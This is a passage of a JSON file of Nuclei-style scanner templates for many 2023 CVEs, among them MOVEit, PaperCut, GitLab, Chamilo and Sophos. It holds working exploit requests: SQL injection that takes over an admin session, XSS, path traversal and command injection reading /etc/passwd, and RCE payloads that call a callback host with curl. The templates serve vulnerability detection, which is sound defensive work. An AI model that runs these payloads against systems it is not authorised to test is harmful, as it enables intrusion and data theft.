Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN:VCALENDAR","END:VCALENDAR"],"condition":"and"},{"type":"word","part":"header","words":["text/Calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27292","info":{"name":"OpenCATS - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=settings&a=previewPage&url=https://oast.me HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>Page Preview</TITLE>","<FRAME src=\"https://oast.me\">"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33568","info":{"name":"Dolibarr Unauthenticated Contacts Database Theft","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"database_user\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33439","info":{"name":"Faculty Evaluation System v1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=login HTTP/1.1\nHost:{{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nemail={{username}}&password={{password}}&login=1\n","GET /admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1\nHost:{{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Fatal error:\")","contains(body, \"XPATH syntax error:\")"],"condition":"and"}]}]},{"id":"CVE-2023-2822","info":{"name":"Ellucian Ethos Identity CAS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cas/logout?url=https://oast.pro\"><img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Identity Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29622","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=test&password=test')+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+('orQN'='orQN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"incorrect\")"],"condition":"and"}]}]},{"id":"CVE-2023-33440","info":{"name":"Faculty Evaluation System v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=save_user HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------1037163726497\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"id\"\n\n1\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"firstname\"\n\nAdministrator\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"lastname\"\n\na\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5('CVE-2023-33440'); ?>\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"email\"\n\n{{email}}\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"password\"\n\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"cpass\"\n\n\n-----------------------------1037163726497--\n","GET /login.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","regex(\"^1$\", body_1)","!regex(\"^2$\", body_1)","len(body_1) == 1","contains(body_2, \"Faculty Evaluation\")"],"condition":"and"}]}]},{"id":"CVE-2023-23161","info":{"name":"Art Gallery Management System Project v1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["center\"><img src=1 onerror=alert(document.domain)>","Art Type"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1454","info":{"name":"Jeecg-boot 3.5.0 qurestSql - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/qurestSql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"apiSelectId\":\"1316997232402231298\",\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQLException","XPATH syntax error:"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["XPATH syntax error: '([a-z_@%]+)'","XPATH syntax error: '([a-z- @%]+)'","XPATH syntax error: '([a-z@%0-9.]+)'"],"part":"body"}]}]},{"id":"CVE-2023-36289","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}\"%20onmouseover=alert(document.domain)%20y=&token={{randstr}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain)","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0514","info":{"name":"Membership Database <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"Member Database\")"],"condition":"and"}]}]},{"id":"CVE-2023-36287","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncontroller=change-currency9405'-alert(document.domain)-'&id_currency=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'change-currency9405'-alert(document.domain)-'';","customizationIdMessage"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27179","info":{"name":"GDidees CMS v3.9.1 - Arbitrary File Download","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_admin/imgdownload.php?filename=imgdownload.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["$filename=$_GET[\"filename\"];","@readfile($filename) OR die();"],"condition":"and"},{"type":"word","part":"header","words":["application/force-download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2825","info":{"name":"GitLab 16.0.0 - Path Traversal","severity":"high"},"requests":[{"raw":["GET /users/sign_in HTTP/1.1\nHost: {{Hostname}}\n","POST /users/sign_in HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\nuser%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\ngroup%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","@timeout: 15s\nPOST /projects HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nproject%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}\n","POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nX-CSRF-Token: {{x-csrf-token}}\nContent-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6\n\n--0ce2a9fbe06b6da89c138a35a1765ed6\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}\"\n\n{{randstr}}\n--0ce2a9fbe06b6da89c138a35a1765ed6--\n","GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"cookie-reuse":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["726f6f743a78"],"encoding":"hex"},{"type":"word","part":"header","words":["application/octet-stream","etc%2Fpasswd"],"condition":"and"}],"extractors":[{"type":"regex","name":"token_1","group":1,"regex":["name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"token_2","group":1,"regex":["name=\"csrf\\-token\" content=\"([A-Z_0-9a-z-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"parent_id","group":1,"regex":["href=\"\\/groups\\/new\\?parent_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"namespace_id","group":1,"regex":["ref=\"\\/projects\\/new\\?namespace_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"x-csrf-token","group":1,"regex":["const headers = \\{\"X\\-CSRF\\-Token\":\"([a-zA-Z-0-9_]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"upload-hash","group":1,"regex":["\"url\":\"\\/uploads\\/([0-9a-z]+)\\/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-1496","info":{"name":"Imgproxy < 3.14.0 - Cross-site Scripting (XSS)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg"],"matchers":[{"type":"dsl","dsl":["contains(body, 'PC9zdmc+#test')","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["content_security_policy"]}]}]},{"id":"CVE-2023-34960","info":{"name":"Chamilo Command Injection","severity":"high"},"requests":[{"raw":["POST /main/webservices/additional_webservices.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"{{RootURL}}\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ns2=\"http://xml.apache.org/xml-soap\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type=\"ns2:Map\"><item><key xsi:type=\"xsd:string\">file_data</key><value xsi:type=\"xsd:string\"></value></item><item><key xsi:type=\"xsd:string\">file_name</key><value xsi:type=\"xsd:string\">`{}`.pptx'|\" |cat /etc/passwd||a #</value></item><item><key xsi:type=\"xsd:string\">service_ppt2lp_size</key><value xsi:type=\"xsd:string\">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"part":"body"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27482","info":{"name":"Home Assistant Supervisor - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1\nHost: {{Hostname}}\n","GET /api/hassio/app/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 1\nHost: {{Hostname}}\n","GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 2\nHost: {{Hostname}}\nX-Hass-Is-Admin:1\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["\"slug\":","\"name\":","\"ip_address\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2732","info":{"name":"MStore API <= 3.9.2 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wp-json/wp/v2/add-listing?id=1 HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["email-description","Username"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39143","info":{"name":"PaperCut < 22.1.3 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png"],"matchers":[{"type":"dsl","dsl":["content_length == 1655","status_code == 200","contains(to_lower(content_type), \"image/png\")","contains(hex_encode(body), \"89504e470d0a1a0a\")"],"condition":"and"}]}]},{"id":"CVE-2023-20888","info":{"name":"VMware Aria Operations for Networks - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/events/push-notifications HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: application/json\n\n{\"endOffset\": \"{{ generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\") }} \"}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-0297","info":{"name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","severity":"critical"},"requests":[{"raw":["GET /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\n","POST /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\njk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["JDownloader"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-2252","info":{"name":"Directorist < 7.5.4 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1671","info":{"name":"Sophos Web Appliance - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?c=blocked&action=continue HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargs_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64(\"\\';curl http://{{interactsh-url}} #\")}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2023-24735","info":{"name":"PMB 7.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/opac_css/pmb.php?url=https://oast.me&hash={{md5('https://oast.me')}}"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-24367","info":{"name":"Temenos T24 R20 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsps/genrequest.jsp?routineName=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>Processing...</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35082","info":{"name":"MobileIron Core - Remote Unauthenticated API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/asfV3/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27350","info":{"name":"PaperCut - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /app?service=page/SetupCompleted HTTP/1.1\nHost: {{Hostname}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FSetupCompleted%2F%24Form&sp=S0&Form0=%24Hidden%2CanalyticsEnabled%2C%24Submit&%24Hidden=true&%24Submit=Login\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print-and-device.script.enabled&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=Y&%24Submit=Update\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print.script.sandboxed&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=N&%24Submit=Update\n","GET /app?service=page/PrinterList HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=page%2FPrinterList\n","POST /app?service=direct/1/PrinterList/selectPrinter&sp={{printerID}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterList%2FselectPrinter&sp={{printerID}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2FprinterOptionsTab.tab&sp=4\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2F%24PrinterDetailsScript.%24Form&sp=S0&Form0=printerId%2CenablePrintScript%2CscriptBody%2C%24Submit%2C%24Submit%240%2C%24Submit%241&printerId={{printerID}}&enablePrintScript=on&scriptBody=function+printJobHook%28inputs%2C+actions%29+%7B%7D%0D%0Ajava.lang.Runtime.getRuntime%28%29.exec%28%27{{cmd}}%27%29%3B&%24Submit%241=Apply\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Avanceret kontering"]}],"extractors":[{"type":"regex","name":"printerID","group":1,"regex":["erList\\/selectPrinterCost&amp;sp=([a-z0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-2272","info":{"name":"Tiempo.com <= 0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Tiempo\")"],"condition":"and"}]}]},{"id":"CVE-2023-34362","info":{"name":"MOVEit Transfer - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nCookie: siLockLongTermInstID=0\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyUsername: Guest\nX-siLock-SessVar1: MyPkgAccessCode: 123\nX-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com\nCookie: siLockLongTermInstID=0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: siLockLongTermInstID=0\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nArg06=123\n","@Host: https://checkip.amazonaws.com\nGET / HTTP/1.1\nHost: checkip.amazonaws.com\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nAccept: */*\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyPkgID: 0\nX-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('{{sessioncookie}}');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET InstId='1234' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET IpAddress='{{ips}}' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET Timeout='60' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET ResilNode='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET AcctReady='1' WHERE SessionID='{{sessioncookie}}'; -- asdf\nCookie: siLockLongTermInstID=0\nContent-Length: 0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0\nContent-Type: application/x-www-form-urlencoded\n\nCsrfToken={{csrf}}&transaction=secmsgpost&Arg01=email_subject&Arg04=email_body&Arg06=123&Arg05=send&Arg08=email%40example.com&Arg09=attachment_list\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{sessioncookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_7","words":["{\"access_token\":"]},{"type":"word","part":"header_7","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ips","regex":["\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b"],"internal":true},{"type":"regex","name":"csrf","group":1,"regex":["name=\"csrftoken\" value=\"(\\w+)\">"],"internal":true,"part":"body"},{"type":"regex","name":"access_token","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body"}]}]},{"id":"CVE-2023-2023","info":{"name":"Custom 404 Pro < 3.7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, 